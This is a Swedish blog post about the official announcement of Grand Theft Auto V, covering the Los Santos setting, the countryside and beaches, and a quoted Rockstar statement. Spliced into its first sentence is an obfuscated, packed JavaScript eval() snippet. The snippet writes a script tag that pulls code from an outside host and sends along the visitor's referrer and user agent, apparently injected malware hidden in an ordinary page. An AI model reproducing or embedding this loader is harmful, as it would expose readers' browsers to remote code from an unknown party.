Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Senaste information om GTA V (5)

Senaste information om GTA V (5)
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stnee|var|u0026u|referrer|fznhh||js|php’.split(’|’),0,{}))
har Rockstar äntligen pratat ut själva och gett oss lite mer info än bara en trailer på det kommande spelet Grand Theft Auto 5.

Vi kommer att få återslutas i staden Los Santos som uppfanns i GTA San Andreas. Vi kommer inte få tillgång att åka över till städerna Las Venturas och San Fierro. Dock säger de att vi inte ska bli ledsna då GTA 5 kommer vara det största Grand Theft Auto spelet någonsin. Vi kommer få ”surrounding hills, countryside and beaches” som var det jag gillade med San Andreas. Glida ut på landet och ner på stranden och ta en promenad bland alla strandraggare.

Spelet kommer att lägga fokus på pengar (som loggan visar), lyx och det Hollywood liv många i Los Angeles lever idag. Det kommer vara en portion av det moderna liv som idag finns i det soliga Kalifornien.

[quote]We are very proud to officially announce that Grand Theft Auto V is in full development.
Developed by series creator Rockstar North, Grand Theft Auto V heads to the city of Los Santos and surrounding hills, countryside and beaches in the largest and most ambitious game Rockstar has yet created.[/quote]

GTA 5 ska tydligen ta open-world till en helt ny nivå. Även en stor multiplayer online väntas inkluderas.

Mer info: Kommer